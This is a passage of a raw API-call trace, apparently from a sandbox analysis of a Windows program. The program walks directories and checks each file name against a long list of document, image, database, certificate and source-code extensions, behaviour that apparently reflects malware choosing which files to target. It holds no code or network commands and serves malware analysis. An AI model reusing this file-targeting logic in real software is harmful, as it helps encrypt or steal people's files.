lstrlenW (lpString=".cub") returned 4 [0306.566] lstrcmpiW (lpString1=".cub", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".dae") returned 4 [0306.566] lstrcmpiW (lpString1=".dae", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".dat") returned 4 [0306.566] lstrcmpiW (lpString1=".dat", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".db") returned 3 [0306.566] lstrcmpiW (lpString1=".db", lpString2="WAV") returned -1 [0306.566] lstrlenW (lpString=".dbf") returned 4 [0306.566] lstrcmpiW (lpString1=".dbf", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".dbx") returned 4 [0306.566] lstrcmpiW (lpString1=".dbx", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".dc3") returned 4 [0306.566] lstrcmpiW (lpString1=".dc3", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".dcm") returned 4 [0306.566] lstrcmpiW (lpString1=".dcm", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".dcr") returned 4 [0306.567] lstrcmpiW (lpString1=".dcr", lpString2=".WAV") returned -1 [0306.567] lstrlenW (lpString=".der") returned 4 [0306.567] lstrcmpiW (lpString1=".der", lpString2=".WAV") returned -1 [0306.567] lstrlenW (lpString=".dib") returned 4 [0306.567] lstrcmpiW (lpString1=".dib", lpString2=".WAV") returned -1 [0306.567] lstrlenW (lpString=".dic") returned 4 [0306.567] lstrcmpiW (lpString1=".dic", lpString2=".WAV") returned -1 [0306.567] lstrlenW (lpString=".dif") returned 4 [0306.567] lstrcmpiW (lpString1=".dif", lpString2=".WAV") returned -1 [0306.567] lstrlenW (lpString=".divx") returned 5 [0306.567] lstrcmpiW (lpString1=".divx", lpString2="N.WAV") returned -1 [0306.567] lstrlenW (lpString=".djvu") returned 5 [0306.567] lstrcmpiW (lpString1=".djvu", lpString2="N.WAV") returned -1 [0306.567] lstrlenW (lpString=".dng") returned 4 [0306.567] lstrcmpiW (lpString1=".dng", lpString2=".WAV") returned -1 [0306.567] lstrlenW (lpString=".doc") returned 4 [0306.567] lstrcmpiW (lpString1=".doc", lpString2=".WAV") returned -1 [0306.567] lstrlenW (lpString=".docm") returned 5 [0306.567] lstrcmpiW (lpString1=".docm", lpString2="N.WAV") returned -1 [0306.567] lstrlenW (lpString=".docx") returned 5 [0306.567] lstrcmpiW (lpString1=".docx", lpString2="N.WAV") returned -1 [0306.567] lstrlenW (lpString=".dot") returned 4 [0306.567] lstrcmpiW (lpString1=".dot", lpString2=".WAV") returned -1 [0306.567] lstrlenW (lpString=".dotm") returned 5 [0306.568] lstrcmpiW (lpString1=".dotm", lpString2="N.WAV") returned -1 [0306.568] lstrlenW (lpString=".dotx") returned 5 [0306.568] lstrcmpiW (lpString1=".dotx", lpString2="N.WAV") returned -1 [0306.568] lstrlenW (lpString=".dpx") returned 4 [0306.568] lstrcmpiW (lpString1=".dpx", lpString2=".WAV") returned -1 [0306.568] lstrlenW (lpString=".dqy") returned 4 [0306.568] lstrcmpiW (lpString1=".dqy", lpString2=".WAV") returned -1 [0306.568] lstrlenW (lpString=".dsn") returned 4 [0306.568] lstrcmpiW (lpString1=".dsn", lpString2=".WAV") returned -1 [0306.568] lstrlenW (lpString=".dt") returned 3 [0306.568] lstrcmpiW (lpString1=".dt", lpString2="WAV") returned -1 [0306.568] lstrlenW (lpString=".dtd") returned 4 [0306.568] lstrcmpiW (lpString1=".dtd", lpString2=".WAV") returned -1 [0306.568] lstrlenW (lpString=".dwg") returned 4 [0306.568] lstrcmpiW (lpString1=".dwg", lpString2=".WAV") returned -1 [0306.568] lstrlenW (lpString=".dwt") returned 4 [0306.568] lstrcmpiW (lpString1=".dwt", lpString2=".WAV") returned -1 [0306.568] lstrlenW (lpString=".dx") returned 3 [0306.568] lstrcmpiW (lpString1=".dx", lpString2="WAV") returned -1 [0306.568] lstrlenW (lpString=".dxf") returned 4 [0306.568] lstrcmpiW (lpString1=".dxf", lpString2=".WAV") returned -1 [0306.568] lstrlenW (lpString=".edml") returned 5 [0306.568] lstrcmpiW (lpString1=".edml", lpString2="N.WAV") returned -1 [0306.568] lstrlenW (lpString=".efd") returned 4 [0306.569] lstrcmpiW (lpString1=".efd", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".elf") returned 4 [0306.569] lstrcmpiW (lpString1=".elf", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".emf") returned 4 [0306.569] lstrcmpiW (lpString1=".emf", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".emz") returned 4 [0306.569] lstrcmpiW (lpString1=".emz", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".epf") returned 4 [0306.569] lstrcmpiW (lpString1=".epf", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".eps") returned 4 [0306.569] lstrcmpiW (lpString1=".eps", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".epsf") returned 5 [0306.569] lstrcmpiW (lpString1=".epsf", lpString2="N.WAV") returned -1 [0306.569] lstrlenW (lpString=".epsp") returned 5 [0306.569] lstrcmpiW (lpString1=".epsp", lpString2="N.WAV") returned -1 [0306.569] lstrlenW (lpString=".erf") returned 4 [0306.569] lstrcmpiW (lpString1=".erf", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".exr") returned 4 [0306.569] lstrcmpiW (lpString1=".exr", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".f4v") returned 4 [0306.569] lstrcmpiW (lpString1=".f4v", lpString2=".WAV") returned -1 [0306.569] lstrlenW (lpString=".fido") returned 5 [0306.570] lstrcmpiW (lpString1=".fido", lpString2="N.WAV") returned -1 [0306.570] lstrlenW (lpString=".flm") returned 4 [0306.570] lstrcmpiW (lpString1=".flm", lpString2=".WAV") returned -1 [0306.570] lstrlenW (lpString=".flv") returned 4 [0306.570] lstrcmpiW (lpString1=".flv", lpString2=".WAV") returned -1 [0306.570] lstrlenW (lpString=".frm") returned 4 [0306.570] lstrcmpiW (lpString1=".frm", lpString2=".WAV") returned -1 [0306.570] lstrlenW (lpString=".fxg") returned 4 [0306.570] lstrcmpiW (lpString1=".fxg", lpString2=".WAV") returned -1 [0306.570] lstrlenW (lpString=".geo") returned 4 [0306.570] lstrcmpiW (lpString1=".geo", lpString2=".WAV") returned -1 [0306.570] lstrlenW (lpString=".gif") returned 4 [0306.570] lstrcmpiW (lpString1=".gif", lpString2=".WAV") returned -1 [0306.570] lstrlenW (lpString=".grs") returned 4 [0306.570] lstrcmpiW (lpString1=".grs", lpString2=".WAV") returned -1 [0306.570] lstrlenW (lpString=".gz") returned 3 [0306.570] lstrcmpiW (lpString1=".gz", lpString2="WAV") returned -1 [0306.570] lstrlenW (lpString=".h") returned 2 [0306.570] lstrcmpiW (lpString1=".h", lpString2="AV") returned -1 [0306.570] lstrlenW (lpString=".hdr") returned 4 [0306.571] lstrcmpiW (lpString1=".hdr", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".hpp") returned 4 [0306.571] lstrcmpiW (lpString1=".hpp", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".hta") returned 4 [0306.571] lstrcmpiW (lpString1=".hta", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".htc") returned 4 [0306.571] lstrcmpiW (lpString1=".htc", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".htm") returned 4 [0306.571] lstrcmpiW (lpString1=".htm", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".html") returned 5 [0306.571] lstrcmpiW (lpString1=".html", lpString2="N.WAV") returned -1 [0306.571] lstrlenW (lpString=".icb") returned 4 [0306.571] lstrcmpiW (lpString1=".icb", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".ics") returned 4 [0306.571] lstrcmpiW (lpString1=".ics", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".iff") returned 4 [0306.571] lstrcmpiW (lpString1=".iff", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".inc") returned 4 [0306.571] lstrcmpiW (lpString1=".inc", lpString2=".WAV") returned -1 [0306.571] lstrlenW (lpString=".indd") returned 5 [0306.571] lstrcmpiW (lpString1=".indd", lpString2="N.WAV") returned -1 [0306.572] lstrlenW (lpString=".ini") returned 4 [0306.572] lstrcmpiW (lpString1=".ini", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".iqy") returned 4 [0306.572] lstrcmpiW (lpString1=".iqy", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".j2c") returned 4 [0306.572] lstrcmpiW (lpString1=".j2c", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".j2k") returned 4 [0306.572] lstrcmpiW (lpString1=".j2k", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".java") returned 5 [0306.572] lstrcmpiW (lpString1=".java", lpString2="N.WAV") returned -1 [0306.572] lstrlenW (lpString=".jp2") returned 4 [0306.572] lstrcmpiW (lpString1=".jp2", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".jpc") returned 4 [0306.572] lstrcmpiW (lpString1=".jpc", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".jpe") returned 4 [0306.572] lstrcmpiW (lpString1=".jpe", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".jpeg") returned 5 [0306.572] lstrcmpiW (lpString1=".jpeg", lpString2="N.WAV") returned -1 [0306.572] lstrlenW (lpString=".jpf") returned 4 [0306.572] lstrcmpiW (lpString1=".jpf", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".jpg") returned 4 [0306.572] lstrcmpiW (lpString1=".jpg", lpString2=".WAV") returned -1 [0306.572] lstrlenW (lpString=".jpx") returned 4 [0306.572] lstrcmpiW (lpString1=".jpx", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".js") returned 3 [0306.573] lstrcmpiW (lpString1=".js", lpString2="WAV") returned -1 [0306.573] lstrlenW (lpString=".jsf") returned 4 [0306.573] lstrcmpiW (lpString1=".jsf", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".json") returned 5 [0306.573] lstrcmpiW (lpString1=".json", lpString2="N.WAV") returned -1 [0306.573] lstrlenW (lpString=".jsp") returned 4 [0306.573] lstrcmpiW (lpString1=".jsp", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".kdc") returned 4 [0306.573] lstrcmpiW (lpString1=".kdc", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".kmz") returned 4 [0306.573] lstrcmpiW (lpString1=".kmz", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".kwm") returned 4 [0306.573] lstrcmpiW (lpString1=".kwm", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".lasso") returned 6 [0306.573] lstrcmpiW (lpString1=".lasso", lpString2="AN.WAV") returned -1 [0306.573] lstrlenW (lpString=".lbi") returned 4 [0306.573] lstrcmpiW (lpString1=".lbi", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".lgf") returned 4 [0306.573] lstrcmpiW (lpString1=".lgf", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".lgp") returned 4 [0306.573] lstrcmpiW (lpString1=".lgp", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".log") returned 4 [0306.573] lstrcmpiW (lpString1=".log", lpString2=".WAV") returned -1 [0306.573] lstrlenW (lpString=".m1v") returned 4 [0306.573] lstrcmpiW (lpString1=".m1v", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".m4a") returned 4 [0306.574] lstrcmpiW (lpString1=".m4a", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".m4v") returned 4 [0306.574] lstrcmpiW (lpString1=".m4v", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".max") returned 4 [0306.574] lstrcmpiW (lpString1=".max", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".md") returned 3 [0306.574] lstrcmpiW (lpString1=".md", lpString2="WAV") returned -1 [0306.574] lstrlenW (lpString=".mda") returned 4 [0306.574] lstrcmpiW (lpString1=".mda", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".mdb") returned 4 [0306.574] lstrcmpiW (lpString1=".mdb", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".mde") returned 4 [0306.574] lstrcmpiW (lpString1=".mde", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".mdf") returned 4 [0306.574] lstrcmpiW (lpString1=".mdf", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".mdw") returned 4 [0306.574] lstrcmpiW (lpString1=".mdw", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".mef") returned 4 [0306.574] lstrcmpiW (lpString1=".mef", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".mft") returned 4 [0306.574] lstrcmpiW (lpString1=".mft", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".mfw") returned 4 [0306.574] lstrcmpiW (lpString1=".mfw", lpString2=".WAV") returned -1 [0306.574] lstrlenW (lpString=".mht") returned 4 [0306.574] lstrcmpiW (lpString1=".mht", lpString2=".WAV") returned -1 [0306.575] lstrlenW (lpString=".mhtml") returned 6 [0306.575] lstrcmpiW (lpString1=".mhtml", lpString2="AN.WAV") returned -1 [0306.575] lstrlenW (lpString=".mka") returned 4 [0306.575] lstrcmpiW (lpString1=".mka", lpString2=".WAV") returned -1 [0306.575] lstrlenW (lpString=".mkidx") returned 6 [0306.575] lstrcmpiW (lpString1=".mkidx", lpString2="AN.WAV") returned -1 [0306.575] lstrlenW (lpString=".mkv") returned 4 [0306.575] lstrcmpiW (lpString1=".mkv", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".mos") returned 4 [0306.576] lstrcmpiW (lpString1=".mos", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".mov") returned 4 [0306.576] lstrcmpiW (lpString1=".mov", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".mp3") returned 4 [0306.576] lstrcmpiW (lpString1=".mp3", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".mp4") returned 4 [0306.576] lstrcmpiW (lpString1=".mp4", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".mpeg") returned 5 [0306.576] lstrcmpiW (lpString1=".mpeg", lpString2="N.WAV") returned -1 [0306.576] lstrlenW (lpString=".mpg") returned 4 [0306.576] lstrcmpiW (lpString1=".mpg", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".mpv") returned 4 [0306.576] lstrcmpiW (lpString1=".mpv", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".mrw") returned 4 [0306.576] lstrcmpiW (lpString1=".mrw", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".msg") returned 4 [0306.576] lstrcmpiW (lpString1=".msg", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".mxl") returned 4 [0306.576] lstrcmpiW (lpString1=".mxl", lpString2=".WAV") returned -1 [0306.576] lstrlenW (lpString=".myd") returned 4 [0306.576] lstrcmpiW (lpString1=".myd", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".myi") returned 4 [0306.577] lstrcmpiW (lpString1=".myi", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".nef") returned 4 [0306.577] lstrcmpiW (lpString1=".nef", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".nrw") returned 4 [0306.577] lstrcmpiW (lpString1=".nrw", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".obj") returned 4 [0306.577] lstrcmpiW (lpString1=".obj", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".odb") returned 4 [0306.577] lstrcmpiW (lpString1=".odb", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".odc") returned 4 [0306.577] lstrcmpiW (lpString1=".odc", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".odm") returned 4 [0306.577] lstrcmpiW (lpString1=".odm", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".odp") returned 4 [0306.577] lstrcmpiW (lpString1=".odp", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".ods") returned 4 [0306.577] lstrcmpiW (lpString1=".ods", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".oft") returned 4 [0306.577] lstrcmpiW (lpString1=".oft", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".one") returned 4 [0306.577] lstrcmpiW (lpString1=".one", lpString2=".WAV") returned -1 [0306.577] lstrlenW (lpString=".onepkg") returned 7 [0306.577] lstrcmpiW (lpString1=".onepkg", lpString2="CAN.WAV") returned -1 [0306.577] lstrlenW (lpString=".onetoc2") returned 8 [0306.577] lstrcmpiW (lpString1=".onetoc2", lpString2=".CAN.WAV") returned 1 [0306.578] lstrlenW (lpString=".opt") returned 4 [0306.578] lstrcmpiW (lpString1=".opt", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".oqy") returned 4 [0306.578] lstrcmpiW (lpString1=".oqy", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".orf") returned 4 [0306.578] lstrcmpiW (lpString1=".orf", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".p12") returned 4 [0306.578] lstrcmpiW (lpString1=".p12", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".p7b") returned 4 [0306.578] lstrcmpiW (lpString1=".p7b", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".p7c") returned 4 [0306.578] lstrcmpiW (lpString1=".p7c", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".pam") returned 4 [0306.578] lstrcmpiW (lpString1=".pam", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".pbm") returned 4 [0306.578] lstrcmpiW (lpString1=".pbm", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".pct") returned 4 [0306.578] lstrcmpiW (lpString1=".pct", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".pcx") returned 4 [0306.578] lstrcmpiW (lpString1=".pcx", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".pdd") returned 4 [0306.578] lstrcmpiW (lpString1=".pdd", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".pdf") returned 4 [0306.578] lstrcmpiW (lpString1=".pdf", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".pdp") returned 4 [0306.578] lstrcmpiW (lpString1=".pdp", lpString2=".WAV") returned -1 [0306.578] lstrlenW (lpString=".pef") returned 4 [0306.579] lstrcmpiW (lpString1=".pef", lpString2=".WAV") returned -1 [0306.579] lstrlenW (lpString=".pem") returned 4 [0306.579] lstrcmpiW (lpString1=".pem", lpString2=".WAV") returned -1 [0306.579] lstrlenW (lpString=".pff") returned 4 [0306.579] lstrcmpiW (lpString1=".pff", lpString2=".WAV") returned -1 [0306.579] lstrlenW (lpString=".pfm") returned 4 [0306.579] lstrcmpiW (lpString1=".pfm", lpString2=".WAV") returned -1 [0306.579] lstrlenW (lpString=".pfx") returned 4 [0306.579] lstrcmpiW (lpString1=".pfx", lpString2=".WAV") returned -1 [0306.579] lstrlenW (lpString=".pgm") returned 4 [0306.579] lstrcmpiW (lpString1=".pgm", lpString2=".WAV") returned -1 [0306.579] lstrlenW (lpString=".php") returned 4 [0306.579] lstrcmpiW (lpString1=".php", lpString2=".WAV") returned -1 [0306.579] lstrlenW (lpString=".php3") returned 5 [0306.579] lstrcmpiW (lpString1=".php3", lpString2="N.WAV") returned -1 [0306.579] lstrlenW (lpString=".php4") returned 5 [0306.579] lstrcmpiW (lpString1=".php4", lpString2="N.WAV") returned -1 [0306.579] lstrlenW (lpString=".php5") returned 5 [0306.579] lstrcmpiW (lpString1=".php5", lpString2="N.WAV") returned -1 [0306.579] lstrlenW (lpString=".phtml") returned 6 [0306.579] lstrcmpiW (lpString1=".phtml", lpString2="AN.WAV") returned -1 [0306.579] lstrlenW (lpString=".pict") returned 5 [0306.579] lstrcmpiW (lpString1=".pict", lpString2="N.WAV") returned -1 [0306.579] lstrlenW (lpString=".pl") returned 3 [0306.579] lstrcmpiW (lpString1=".pl", lpString2="WAV") returned -1 [0306.579] lstrlenW (lpString=".pls") returned 4 [0306.580] lstrcmpiW (lpString1=".pls", lpString2=".WAV") returned -1 [0306.580] lstrlenW (lpString=".pm") returned 3 [0306.580] lstrcmpiW (lpString1=".pm", lpString2="WAV") returned -1 [0306.580] lstrlenW (lpString=".png") returned 4 [0306.580] lstrcmpiW (lpString1=".png", lpString2=".WAV") returned -1 [0306.580] lstrlenW (lpString=".pnm") returned 4 [0306.580] lstrcmpiW (lpString1=".pnm", lpString2=".WAV") returned -1 [0306.580] lstrlenW (lpString=".pot") returned 4 [0306.580] lstrcmpiW (lpString1=".pot", lpString2=".WAV") returned -1 [0306.580] lstrlenW (lpString=".potm") returned 5 [0306.580] lstrcmpiW (lpString1=".potm", lpString2="N.WAV") returned -1 [0306.580] lstrlenW (lpString=".potx") returned 5 [0306.580] lstrcmpiW (lpString1=".potx", lpString2="N.WAV") returned -1 [0306.580] lstrlenW (lpString=".ppa") returned 4 [0306.580] lstrcmpiW (lpString1=".ppa", lpString2=".WAV") returned -1 [0306.580] lstrlenW (lpString=".ppam") returned 5 [0306.580] lstrcmpiW (lpString1=".ppam", lpString2="N.WAV") returned -1 [0306.580] lstrlenW (lpString=".ppm") returned 4 [0306.580] lstrcmpiW (lpString1=".ppm", lpString2=".WAV") returned -1 [0306.580] lstrlenW (lpString=".pps") returned 4 [0306.580] lstrcmpiW (lpString1=".pps", lpString2=".WAV") returned -1 [0306.580] lstrlenW (lpString=".ppsm") returned 5 [0306.580] lstrcmpiW (lpString1=".ppsm", lpString2="N.WAV") returned -1 [0306.580] lstrlenW (lpString=".ppt") returned 4 [0306.580] lstrcmpiW (lpString1=".ppt", lpString2=".WAV") returned -1 [0306.580] lstrlenW (lpString=".pptm") returned 5 [0306.581] lstrcmpiW (lpString1=".pptm", lpString2="N.WAV") returned -1 [0306.581] lstrlenW (lpString=".pptx") returned 5 [0306.581] lstrcmpiW (lpString1=".pptx", lpString2="N.WAV") returned -1 [0306.581] lstrlenW (lpString=".prn") returned 4 [0306.581] lstrcmpiW (lpString1=".prn", lpString2=".WAV") returned -1 [0306.581] lstrlenW (lpString=".ps") returned 3 [0306.581] lstrcmpiW (lpString1=".ps", lpString2="WAV") returned -1 [0306.581] lstrlenW (lpString=".psb") returned 4 [0306.581] lstrcmpiW (lpString1=".psb", lpString2=".WAV") returned -1 [0306.581] lstrlenW (lpString=".psd") returned 4 [0306.581] lstrcmpiW (lpString1=".psd", lpString2=".WAV") returned -1 [0306.581] lstrlenW (lpString=".pst") returned 4 [0306.581] lstrcmpiW (lpString1=".pst", lpString2=".WAV") returned -1 [0306.581] lstrlenW (lpString=".ptx") returned 4 [0306.581] lstrcmpiW (lpString1=".ptx", lpString2=".WAV") returned -1 [0306.581] lstrlenW (lpString=".pub") returned 4 [0306.581] lstrcmpiW (lpString1=".pub", lpString2=".WAV") returned -1 [0306.581] lstrlenW (lpString=".pwm") returned 4 [0306.581] lstrcmpiW (lpString1=".pwm", lpString2=".WAV") returned -1 [0306.581] lstrlenW (lpString=".pxr") returned 4 [0306.581] lstrcmpiW (lpString1=".pxr", lpString2=".WAV") returned -1 [0306.581] lstrlenW (lpString=".py") returned 3 [0306.581] lstrcmpiW (lpString1=".py", lpString2="WAV") returned -1 [0306.581] lstrlenW (lpString=".qt") returned 3 [0306.581] lstrcmpiW (lpString1=".qt", lpString2="WAV") returned -1 [0306.582] lstrlenW (lpString=".r3d") returned 4 [0306.582] lstrcmpiW (lpString1=".r3d", lpString2=".WAV") returned -1 [0306.583] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0306.727] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Things", cAlternateFileName="")) returned 0 [0306.727] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0306.727] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.727] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolBMPs", cAlternateFileName="")) returned 1 [0306.730] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.730] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolData", cAlternateFileName="")) returned 1 [0306.734] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.734] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 1 [0306.734] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.734] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 0 [0306.734] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0306.734] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0306.735] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1983d259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="groove.net", cAlternateFileName="")) returned 0 [0306.735] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0306.735] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.735] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 1 [0306.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.739] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: 